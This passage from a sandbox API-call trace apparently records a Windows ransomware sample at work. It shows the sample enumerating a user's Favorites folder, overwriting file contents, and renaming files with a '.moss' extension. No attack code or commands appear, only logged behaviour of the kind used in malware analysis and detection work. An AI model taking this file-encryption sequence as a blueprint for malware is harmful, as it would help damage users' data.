CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.315] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.315] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.315] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.316] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.316] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.316] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.316] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.316] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.317] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.moss")) returned 1 [0171.318] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.319] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0171.319] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.319] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.319] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.320] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.321] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.322] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.322] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.323] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.323] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0171.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.327] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0171.327] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0171.327] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.327] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.327] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.327] PathFindFileNameW (pszPath="") returned="" [0171.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0171.329] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.329] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0171.329] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0171.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.329] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.329] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, 